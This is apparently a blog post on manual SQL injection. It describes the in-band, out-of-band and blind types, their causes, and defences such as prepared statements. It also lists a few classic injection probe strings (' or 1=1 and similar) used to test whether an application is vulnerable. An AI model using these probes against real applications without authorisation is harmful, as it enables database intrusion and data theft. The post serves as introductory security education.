Categories

Dumping database using sql injection

I have given an overview of SQL INJECTION (SQLI) in my previous post. As I mentioned you that the SQLI can be done in two ways

MANUALLY.

AUTOMATION.

Here we are going to discuss the Manual method of injection.

Manual SQL Injection is done by Manually pen-testing the application where the pen-tester or the attacker exploits the SQLI by injecting the malicious/vulnerable string into the application directly by interacting with it and digs juicy information from the application like usernames, passwords, SSN, etc… without using any tool.

In-band: Also know as Error-Based SQLI. Here the application responds with an error. Uses single channel for communication. It is straight forward method.

Out-of-band: Communication happens using two way channel. Attacker enters data directly but the application responds by sending e-mails etc….

Blind SQL Injection: Here the applications doesn’t pops any error. Instead the attacker need to extract the data by giving true/false questions and observing the responses of the application.

Causes for SQL Injection:

There might be many causes for any kind of vulnerability in the application. They might be because of

Improper coding

Developer might not be aware of the vulnerabilities

Improper validation

Improper filtering or escaping of the special characters

Directly inserting the values got from the web-form into the SQL query.

Avoiding SQLI:

Using prepared statements is the best solution for avoiding SQLI as the interpreter doesn’t come into the picture each and every time the query is framed.

Doing proper validation

Escaping the suspicious strings or characters

Using Filters or white lists (Allowing only required characters)

Exploiting the Vulnerability:

In-order the exploit the vulnerability, first we need to confirm that the application is vulnerable to SQL Injection. We can test it in many ways by inserting various logical strings to the application like ‘, ‘or’=’, ‘ or 1=1, ‘ or ‘a’=’a’ etc….

I have written an article for exploiting and extracting complete data from the database using all the three types (In-band, Out-of-band, Blind). You can find the article here: Dumping database using SQL Injection.